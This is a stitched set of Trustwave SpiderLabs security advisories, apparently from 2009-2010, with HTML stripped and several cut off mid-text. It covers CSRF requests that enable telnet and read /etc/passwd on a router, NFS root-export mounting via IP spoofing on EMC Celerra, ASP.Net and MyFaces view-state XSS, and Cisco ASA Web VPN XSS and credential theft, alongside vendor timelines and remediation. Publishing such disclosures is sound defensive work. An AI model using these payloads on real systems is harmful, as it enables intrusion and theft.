/form or img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_setenable_remo te_access=YESremote_access_port=80' Enable telnet if not already enabled: form method=post action=http://192.168.1.1/cgi-bin/webmain.cgi; http://192.168.1.1/cgi-bin/webmain.cgi%22 input type=hidden name=act value=act_set_wimax_etc_config input type=hidden name=ENABLE_TELNET value=YES input type=submit /form or img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_configEN ABLE_TELNET=YES' Allow remote telnet access: form method=post action=http://192.168.1.1/cgi-bin/webmain.cgi; http://192.168.1.1/cgi-bin/webmain.cgi%22 input type=hidden name=act value=act_network_set input type=hidden name=add_enable value=YES input type=hidden name=add_host_ip value=1 input type=hidden name=add_port value=23 input type=hidden name=add_protocol value=BOTH input type=hidden name=add_memo value=admintelnet input type=submit /form or img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_setadd_enable= YESadd_host_ip=1add_port=23add_protocol=bothadd_memo=admintelnet' Once compromised, it is possible to download any file from the devices using the following method. Download /etc/passwd file: form method=post action=http://192.168.1.1/cgi-bin/upgrademain.cgi http://192.168.1.1/cgi-bin/upgrademain.cgi input type=hidden name=act value=act_file_download input type=hidden name=METHOD value=PATH input type=hidden name=FILE_PATH value=/etc/passwd input type=submit /form or img src='http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_downloadMETHO D=PATHFILE_PATH=/etc/passwd' Vendor Response: No official response is available at the time of release. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 8/26/10 - Vendor contact initiated. 9/30/10 - Vulnerability details provided to vendor. 12/3/10 - Notified vendor of release date. No workaround or patch provided. 12/10/10 - Advisory published. Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and
TWSL2010-003: Unauthorized access to root NFS export on EMC Celerra NAS appliance
Trustwave's SpiderLabs Security Advisory TWSL2010-003: Unauthorized access to root NFS export on EMC Celerra Network Attached Storage (NAS) appliance https://www.trustwave.com/spiderlabs/advisories/TWSL2010-003.txt Published: 2010-07-29 Version: 1.0 Vendor: EMC (http://www.emc.com) Product: Celerra Unified Storage products (http://www.emc.com/products/family/celerra-family.htm) Version(s) affected: All Product Description: The Celerra Unified Storage Platform provides Network Attached Storage (NAS) services through a combination of server appliances and software modules. Credit: Steve Ocepek of Trustwave's SpiderLabs CVE: CVE-2010-2860 Finding: The Celerra appliance's NFS server freely exports its / file system and enforces access using a factory-defined list of authorized IP addresses. The addresses found on a recent model are listed in the showmount example below, however this list may differ depending on product version. The IP addresses are intended for communication internal to the appliance, but are still accepted from external sources. An attacker can mount this file system by spoofing an authorized IP address. The NFS showmount command can be used to obtain a list of the IP addresses: # showmount -e Celerra IP address Export list for Celerra IP address: / 128.221.253.101,128.221.252.101,128.221.253.100,128.221.252.100 Because the appliance's NFS server does not enable the rootsquash feature, full access to the file system is possible by mounting the export using root (UID 0). Fully spoofing the source IP address (for sending and receiving packets) will usually require access to the local subnet or the ability to exploit some other network infrastructure vulnerability. On Linux, local IP address spoofing can be accomplished by creating an alias interface and using the ip route command to set the source IP accordingly. # ifconfig eth0:0 128.221.253.101 # ip route add Celerra IP address dev eth0 src 128.221.253.101 # mkdir nfs # mount Celerra IP address:/ nfs The flaw allows unauthorized access to files contained on the system, including all CIFS shares and iSCSI mounted drives. The / path does not correspond to the true root of the file system -- only the root of the user data directory is exposed. Vendor Response: The vendor has acknowledged this issue and issued the following workaround. Vendor has also published a knowledgebase article about the issue and mitigation so support can help any customers who call in with this issue until a permanent fix from EMC is available. Vendor estimated date for a code fix is Q3 2010. Remediation Steps: The following recommendations were provided by the vendor. 1. Hide NFS exports and show it only based on the configured access. Setting forceFullShowmount param to 0 (default is 1) will hide the / from the list since only Control Station have access to it for administration purpose: [r...@virgil slot_3]# server_param server_3 -f mount -info forceFullShowmount server_3 : name= forceFullShowmount facility_name = mount default_value = 1 current_value = 1 configured_value= user_action = none change_effective= immediate range = (0,1) description = Forces response to showmount requests to fully populate response. [r...@virgil slot_3]# server_param server_3 -f mount -modify \ forceFullShowmount -value 0 server_3 : done After the above change, client will see only the shares he have permissions to access to: /usr/sbin/showmount -e 172.24.97.3 Export list for 172.24.97.3: /fs1 (everyone) 2. Change default IP addresses (during install or after) for internal network along with first step above to further minimize the exploitability. Product team has provided additional mitigations steps that can be implemented by the customers to reduce the severity of exploitation of a vulnerability: 1. Create IP-based access rules on the network equipment rejecting traffic for IP addresses belonging to internal Celerra network which do have own switch for that purpose. These addresses are listed in the /etc/hosts file of the Celerra Control Station. 2. Configure firewall(s) between Data Movers and NFS clients to reject traffic for IP addresses belonging to the internal Celerra network. 3. Hide NFS exports and show it only based on the configured access. Setting forceFullShowmount param to 0 (default is 1) will hide the ³/² from the list since only Control Station have access to it for administration purpose. 4.Disable IP reflect Vendor Communication Timeline: 05/07/10 - Initial communication 05/10/10 - Vulnerability details provided 05/18/10 - Vulnerability acknowledged, workaround and timeline provided 07/27/10 - Additional workaround details provided Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based
Trustwave's SpiderLabs Security Advisory TWSL2010-001
Trustwave's SpiderLabs Security Advisory TWSL2010-001: Multiplatform View State Tampering Vulnerabilities Published: 2010-02-08 Version: 1.1 SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. View states are used by some web application frameworks to store the state of HTML GUI controls. View states are typically stored in hidden client-side input fields, although server-side storage is widely supported. The affected vendors generally recommend that client-side view states are cryptographically signed and/or encrypted, but specific exploits have not been previously documented. These vulnerabilities show that unsigned client-side view states will ALWAYS result in a vulnerability in the affected products. Credit: David Byrne of Trustwave's SpiderLabs === Vendor: Microsoft (http://www.microsoft.com) Product: ASP.Net (http://www.asp.net) Versions affected: .Net 3.5 is confirmed vulnerable; previous versions are likely to be vulnerable as well. Description: ASP.Net is a web-application development framework that provides for both user interfaces, and back-end functionality. The ASP.Net view state is typically stored in a hidden field named __VIEWSTATE. When a page's view state is not cryptographically signed, many standard .Net controls are vulnerable to Cross-Site Scripting (XSS) through the view state. It is well documented that using an unsigned view state is bad, but most previous advisories focus on vaguely described threats or vulnerabilities introduced by custom use of the view state. To the best of Trustwave's knowledge, this is the first time a proof of concept attack of this nature has been demonstrated against the view state. A vulnerability was alluded to in a 2004 Microsoft article on troubleshooting view state problems [1]. However, other Microsoft documents recommend disabling view state signing if performance is a key consideration, [2, 3, 4] or for various other reasons [5, 6]. Realistically, unsigned view states should never be used in a production environment. The following code is vulnerable to a XSS attack against the form control. Note that the ValidateRequest setting does not prevent the attack. %@ Page EnableViewStateMac=False ValidateRequest=True % html runat=server form runat=server/ /html If the following request is sent to the server, the response will contain JavaScript that calls an alert box. xss.aspx?__VIEWSTATE=/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxY CHglpbm5lcmh0bWwFHTxzY3JpcHQ%2BYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2 BZGQ= The view state's XML equivalent is below: ?xml version=1.0 encoding=utf-16? viewstate Pair Pair String-834067820/String Pair ArrayList Int320/Int32 Pair ArrayList Int321/Int32 Pair ArrayList IndexedStringinnerhtml/IndexedString Stringlt;scriptgt;alert('xss')lt;/scriptgt;/String /ArrayList /Pair /ArrayList /Pair /ArrayList /Pair /Pair /Pair /viewstate The HTML response is below: html form name=ctl01 method=post action=xss.aspx id=ctl01 div input type=hidden name=__VIEWSTATE id=__VIEWSTATE value=/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0b WwFHTxzY3JpcHQ+YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ= / /div scriptalert('xss')/script/form /html This example uses the innerhtml attribute of the form control, although other attributes in other controls are also vulnerable to similar attacks. Remediation Steps: The ASP.Net view state should always be cryptographically signed with a Message Authentication Code (MAC). This has been enabled by default since .Net 1.1, but can be disabled using the EnableViewStateMac setting. Using the ViewStateUserKey setting can also help to mitigate the scope of this vulnerability. [7] === Vendor: Apache Software Foundation (http://www.apache.org) Product: Apache MyFaces (http://myfaces.apache.org/) Versions affected: 1.2.8 and 1.1.7 are confirmed as vulnerable. All previous versions are likely vulnerable. Related products: Some versions of IBM WebSphere Application Server (at least 6.x and 7.x) ship with Apache MyFaces [8,9] Description: MyFaces is an open source implementation of the JavaServer Faces standard. JavaServer Faces [10] is a framework that aids in developing user interfaces for web-based applications. When the application's view state is not encrypted, it is possible for an attacker to supply a new or modified view object as part of a request. The malicious view can contain arbitrary HTML code (allowing Cross-Site Scripting), and arbitrary Expression Language (EL) [11] statements that will be executed on the server. The EL statements can be used to read data stored
Trustwave's SpiderLabs Security Advisory TWSL2009-002
Trustwave's SpiderLabs Security Advisory TWSL2009-002: Cisco ASA Web VPN Multiple Vulnerabilities Published: 2009-06-24 Version: 1.0 Vendor: Cisco Systems, Inc. (http://www.cisco.com) Versions affected: 8.0(4), 8.1.2, and 8.2.1 Description: Cisco's Adaptive Security Appliance (ASA) provides a number of security related features, including Web VPN functionality that allows authenticated users to access a variety of content through a web interface. This includes other web content, FTP servers, and CIFS file servers. The web content is proxied by the ASA and rewritten so that any URLs in the web content are passed as query parameters sent to the ASA web interface. Where scripting content is present, the ASA places a JavaScript wrapper around the original webpage's Document Object Model (DOM), to prevent the webpage from accessing the ASA's DOM. Credit: David Byrne of Trustwave's SpiderLabs Finding 1: Post-Authentication Cross-Site Scripting CVE: CVE-2009-1201 The ASA's DOM wrapper can be rewritten in a manner to allow Cross-Site Scripting (XSS) attacks. For example, the csco_wrap_js JavaScript function in /+CSCOL+/cte.js makes a call to a function referenced by CSCO_WebVPN['process']. The result of this call is then used in an eval statement. function csco_wrap_js(str) { var ret=script id=CSCO_GHOST src=+CSCO_Gateway+ /+CSCOL+/cte.js/scr+ iptscript id=CSCO_GHOST src=+ CSCO_Gateway+/+CSCOE+/apcf/sc+ript; var js_mangled=CSCO_WebVPN['process']('js',str); ret+=CSCO_WebVPN['process']('html',eval(js_mangled)); return ret; }; To exploit this behavior, a malicious page can rewrite CSCO_WebVPN['process'] with an attacker-defined function that will return an arbitrary value. The next time the csco_wrap_js function is called, the malicious code will be executed. Below is a proof of concept. htmlscript function a(b, c) { return alert('Your VPN location:\\n\\n'+ + document.location+'\\n\\n\\n\\n\\n + Your VPN cookie:\\n\\n'+document.cookie);; } CSCO_WebVPN['process'] = a; csco_wrap_js(''); /script/html Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25. Updated Cisco ASA software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT A vendor response will be posted at http://www.cisco.com/security This vulnerability is documented in Cisco Bug ID: CSCsy80694. CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9 Finding 2: HTML Rewriting Bypass CVE: CVE-2009-1202 When a webpage is requested through the ASA's Web VPN, the targeted scheme and hostname is Rot13-encoded, then hex-encoded and placed in the ASA's URL. For example, http://www.trustwave.com; is accessed by requesting the following ASA path: /+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A+ +/ The HTML content of this request is obviously reformatted by the ASA, starting at the very beginning: script id='CSCO_GHOST' src=/+webvpn+/toolbar.js However, if the request URL is modified to change the initial hex value of 00 to 01, the HTML document is returned without any rewriting. This allows the pages scriptable content to run in the ASA's DOM, making Cross-Site Scripting trivial. Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25. Updated Cisco ASA software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT A vendor response will be posted at http://www.cisco.com/security This vulnerability is documented in Cisco Bug ID: CSCsy80705. CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9 Finding 3: Authentication Credential Theft CVE: CVE-2009-1203 When a user accesses an FTP or CIFS destination using the Web VPN, the resulting URL is formatted in a similar manner as the web requests described above. The following URL attempts to connect to ftp.example.com; normally, it would be in an HTML frame within the Web VPN website. /+CSCOE+/files/browse.html?code=initpath=ftp%3A%2F%2F736763 2e726b6e7a6379722e70627a The ASA first attempts to connect to the FTP server or CIFS share using anonymous credentials. If those fail, the user is prompted for login credentials. When viewed on its own (outside of a frame), the submission form gives no indication what it is for and is very similar in appearance to the Web VPN's primary login page. If the URL was sent to a user by an attacker, it is very possible that a user would assume that he needs to resubmit credentials to the Web VPN. The ASA would then forward the credentials to the attacker's FTP or CIFS server. Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25. Updated Cisco ASA software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT A vendor response will be posted at http://www.cisco.com/security This vulnerability is documented in Cisco Bug ID: CSCsy80709. CVSS Score: